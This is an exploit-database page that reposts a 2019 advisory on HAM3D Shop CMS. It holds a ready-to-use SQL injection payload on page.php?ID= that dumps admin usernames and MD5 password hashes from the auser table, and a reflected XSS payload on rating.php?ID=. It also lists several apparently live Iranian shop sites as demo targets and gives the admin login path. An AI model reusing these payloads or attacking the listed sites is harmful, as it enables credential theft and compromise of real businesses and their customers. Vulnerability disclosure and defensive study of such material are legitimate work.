Advertisement






HAM3D Shop CMS Security Hole XSS & SQlinjection [Nullix TM]

CVE Category Price Severity
CWE-79 $500 High
Author Risk Exploitation Type Date
NulliX TM High Remote 2019-02-20
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020210

Below is a copy:

HAM3D Shop CMS Security Hole XSS & SQlinjection [Nullix TM] 
# Exploit Title: HAM3D Shop CMS Security Hole XSS & SQlinjection parameter rating & Page
# Date: 2/13/2019
# Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin
# Vendor Homepage: HAm3D.net
# Version: Final Version
# Tested on: win,linux
=================================================================================
                                             [SQL injection]     

[+] Method ( Sql injection ) Nullix Security Team of IRan
[+] Admin Login Page : www.[path].com/admin/login.php
[+]  parameter  : Page.php?ID=
=================
Mode Hash : MD5 
=================
Exploit ==> 
 page.php?ID=-1'+/*!50000union*/ select /*!50000unhex(hex(grOup_cOncat(username,0x3a,password)))*/+from+auser--+
=================================================================================
Demo:
[+] http://nanokala.ir/page.php?ID=[SQL]
[+] http://www.too30.ir/page.php?ID=[SQL]
=================================================================================

                                                   [XSS]

Method ( XSS ) Nullix Security Team of IRan 
Method = GET
dir : /rating/
  
              parameter  : rating.php?ID=

Exploit : [ "><script>alert(/xss/)</script> ] 

For example : ==== > www.[path]/nanokala.ir/rating/rating.php?ID="><script>alert(/xss/)</script>
======================================================================
[+] Demo : nanokala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo : jamkala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo : too30.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
======================================================================

[+] TNX to ======>  Nullix Team guys

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum